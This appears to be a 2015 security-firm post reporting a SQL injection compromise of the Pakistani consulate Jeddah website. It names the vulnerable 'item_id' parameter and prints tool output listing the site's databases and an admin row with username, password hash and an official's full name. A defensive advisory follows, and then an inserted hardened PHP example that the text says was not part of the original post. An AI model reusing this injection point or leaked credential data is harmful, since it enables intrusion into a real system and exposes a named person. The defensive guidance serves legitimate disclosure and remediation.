Pakistani Websites Vulnerable To SQL Injection Hacked
November 27, 2015
Hacked Website : http://www.pakconsulatejeddah.gov.pk/
Vuln : SQL Injection
Level : 6/10
Authorities Notified : Yes (NATIONAL RESPONSE CENTRE FOR CYBER CRIME)
Date : 27 Nov 2015
Method : Email Advisory
Proof Of Code / Hackers Information (Provided Below) :
Operation planned by: Mr.Instinct
Main Contributors: Xtam4, Axid Burn and Balalaika.
Main Target: http://www.pakconsulatejeddah.gov.pk/index.php
[*] starting at 15:13:28
[15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'item_id' is vulnerable.
back-end DBMS: MySQL 5.0.11
[15:32:31] [INFO] fetching database names
[15:32:47] [INFO] the SQL query used returns 3 entries
[15:32:49] [INFO] retrieved: "information_schema"
[15:32:50] [INFO] retrieved: "pakcons_consulate"
[15:32:58] [INFO] retrieved: "pakcons_tns"
available databases [3]:
[*] information_schema
[*] pakcons_consulate
[*] pakcons_tns
Database: pakcons_consulate
Table: admin
[1 entry]
+----+-------------------+-------------+----------------------------------+--------------+
| id | email             | username    | password                         | full_name    |
+----+-------------------+-------------+----------------------------------+--------------+
| 1  | [email protected] | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
+----+-------------------+-------------+----------------------------------+--------------+
Advisory :
Please escape user input parameter 'item_id'.
Primary Defenses:
Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:
Also Enforce: Least Privilege
Also Perform: White List Input Validation
For more info please visit : https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
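As an added example (not the site's code and not part of the original advisory), a hardened PHP/PDO handler for the 'item_id' lookup that applies the three defenses above: white-list validation, a prepared statement, and a least-privilege database account. The DSN, the 'app_readonly' user, the 'items' table and its columns are assumptions.

```php
<?php
// Added example, not the affected site's code. The vulnerable pattern the
// advisory refers to is string concatenation such as
//   "SELECT ... FROM items WHERE id = " . $_GET['item_id']
// which lets a crafted parameter become part of the SQL statement.
declare(strict_types=1);

// Least privilege: connect as a read-only account that can only SELECT
// from the tables this page needs, never as root or as the account that
// owns the 'admin' table. (DSN and user name are assumptions.)
function connect(): PDO {
    return new PDO(
        'mysql:host=localhost;dbname=app;charset=utf8mb4',
        'app_readonly',
        getenv('APP_DB_PASSWORD') ?: '',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );
}

// White-list input validation: item_id must be a positive integer.
// Anything else (including "1 UNION SELECT ...") is rejected here,
// before it ever reaches the database.
function validateItemId(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Prepared statement: the value is bound as a typed parameter, so the
// database never interprets it as SQL, whatever it contains.
function fetchItem(PDO $pdo, int $itemId): ?array {
    $stmt = $pdo->prepare('SELECT id, title, body FROM items WHERE id = :id');
    $stmt->bindValue(':id', $itemId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$itemId = validateItemId((string)($_GET['item_id'] ?? ''));
if ($itemId === null) {
    http_response_code(400);
    exit('Invalid item_id');
}
$item = fetchItem(connect(), $itemId);
if ($item === null) {
    http_response_code(404);
    exit('Not found');
}
// Output encoding so the stored text cannot become HTML/JS in the page.
echo htmlspecialchars($item['title'], ENT_QUOTES, 'UTF-8');
```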
For any more Advisory and information please feel free to contact us on [email protected].
--
Tier3 Cyber Security Solutions
Islamabad
Pakistan
www.tier3.xyz
#opsec Pakistan
#pakistan #hack #website #tier3 #alert